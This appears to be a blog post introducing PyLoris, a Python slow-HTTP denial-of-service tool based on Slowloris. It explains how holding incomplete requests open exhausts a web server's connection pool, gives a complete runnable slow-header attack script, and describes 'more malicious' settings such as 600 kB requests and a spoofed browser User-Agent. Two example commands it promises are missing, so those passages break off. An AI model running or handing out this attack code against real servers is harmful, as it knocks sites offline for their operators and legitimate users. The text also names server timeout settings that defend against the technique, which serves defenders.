PyLoris: A Python implementation of Slowloris
I came across a wonderful idea on Hack a Day recently: a Denial of Service attack that overwhelms only the service under attack. After reading through RSnake's two writeups, I decided to take a swing at the code. Thus PyLoris was born.
RSnake's tool, Slowloris, is elegant and effective. Its basic principle is that it opens a large number of HTTP connections to a web server and keeps each one open for an extended period by never finishing the request: it sends the request line and a few headers, then trickles out additional header lines at intervals so the server's header-read timer never expires. Because Slowloris never completes a request, and because threaded and process-per-connection web servers cap the number of connections they will hold open at once, the pool of usable connections eventually fills up and legitimate clients are refused. The nice side effect is that the web server is the only service affected: the attack uses almost no bandwidth and does not exhaust the host's memory, so every other service on the system stays fully operational.
PyLoris is written entirely in Python, uses only standard modules, is OS and platform independent, and is less than 100 lines of code. It behaves a little differently from Slowloris in that it throttles the entire request rather than only the gaps between headers, and it lets the user specify both the bandwidth of each connection and the size of the request. Unfortunately, the brevity of the code leaves no room for SSL/TLS handling, so only plain HTTP is supported for the time being.
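To make the mechanism above concrete, here is an added example of a slow-header client in Python. It is not PyLoris's or Slowloris's code; the host, port, header names, rates and the loopback self-check are all assumptions chosen for illustration. It shows the two ideas the text describes: a request that is deliberately left incomplete and kept alive with periodic header lines (the Slowloris trick), and a per-connection byte-rate throttle applied to everything that is sent (the PyLoris variation).

```python
import socket
import threading
import time

# Constructed value for the demonstration; any browser-like string will do.
DEFAULT_UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"


def build_partial_request(host, path="/", user_agent=DEFAULT_UA, method="GET"):
    """Return the start of an HTTP/1.1 request that deliberately omits the
    terminating blank line, so the server keeps waiting for more headers."""
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        f"User-Agent: {user_agent}",
        "Accept: */*",
        "Connection: keep-alive",
    ]
    # A complete request would end with "\r\n\r\n"; we stop one "\r\n" short.
    return ("\r\n".join(lines) + "\r\n").encode()


def keepalive_header(i):
    """One harmless, syntactically valid header line. Sending one of these
    every few seconds resets the server's header-read timeout."""
    return f"X-a: {i}\r\n".encode()


def throttled_send(sock, payload, bytes_per_sec, chunk=1):
    """Write payload to sock at roughly bytes_per_sec, chunk bytes at a time.
    Applying this to the whole request is the PyLoris-style throttle.
    Returns the number of bytes sent."""
    delay = chunk / float(bytes_per_sec)
    sent = 0
    for off in range(0, len(payload), chunk):
        piece = payload[off:off + chunk]
        sock.sendall(piece)
        sent += len(piece)
        time.sleep(delay)
    return sent


def slow_connection(host, port, bytes_per_sec=25, header_interval=10.0, stop=None):
    """One slow client: connect, trickle the partial request, then keep
    appending header lines until the server closes the socket or stop is set.
    Returns how many keep-alive headers were accepted before that happened."""
    i = 0
    with socket.create_connection((host, port), timeout=30) as s:
        throttled_send(s, build_partial_request(host), bytes_per_sec)
        while stop is None or not stop.is_set():
            try:
                throttled_send(s, keepalive_header(i), bytes_per_sec)
            except OSError:
                break  # server gave up on this connection
            i += 1
            time.sleep(header_interval)
    return i


def run(host, port, connections=50, per_second=10, bytes_per_sec=25, duration=60):
    """Ramp up `connections` slow clients at `per_second` new connections per
    second, hold them for `duration` seconds, then signal them to stop."""
    stop = threading.Event()
    for _ in range(connections):
        threading.Thread(target=slow_connection,
                         args=(host, port, bytes_per_sec, 10.0, stop),
                         daemon=True).start()
        time.sleep(1.0 / per_second)
    time.sleep(duration)
    stop.set()


def loopback_check(payload=b"x" * 40, bytes_per_sec=4000, chunk=8):
    """Offline self-check: push payload through a socketpair with the throttle
    and return (bytes_sent, bytes_received) so the pacing code can be verified
    without a real web server."""
    a, b = socket.socketpair()
    try:
        sent = throttled_send(a, payload, bytes_per_sec, chunk)
        a.shutdown(socket.SHUT_WR)
        got = b""
        while True:
            d = b.recv(4096)
            if not d:
                break
            got += d
    finally:
        a.close()
        b.close()
    return sent, got


if __name__ == "__main__":
    # Assumed lab target; only ever point this at a server you own.
    run("127.0.0.1", 8080, connections=50, per_second=10, bytes_per_sec=25, duration=60)
```

With `bytes_per_sec=25` a 150-byte request head takes about six seconds to arrive, and each keep-alive header another fraction of a second, which is the whole point: the server has a worker parked on the connection the entire time. To tell whether a target is actually susceptible, compare its behaviour with and without a header-read timeout enforced (Apache's mod_reqtimeout or nginx's client_header_timeout are the usual knobs); a server that drops the connection after the first interval is not vulnerable to this particular trick.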
Here is a brief description of the things PyLoris can do:
If a user wanted to run a basic test against NOM, it would be as simple as:
But this is hardly a thorough test; there is a lot that could be done to make it harder on the server:
- it limits the total number of requests made to a meager 50
- it sends a relatively small request
- it requests a page that doesn't exist
- it advertises PyLoris in the User-Agent (err...)
A more malicious individual might perform a test like so:
This test will pound the server with an unyielding number of requests, each over 600 kB in length, starting 10 connections per second, each throttled at 25 B/s, and masquerading as Google Chrome. As stated before, PyLoris runs on Linux, Windows, and Mac OS X, and it should work on any platform that can run Python with thread support. If you download the script and find any bugs, please report them via SourceForge.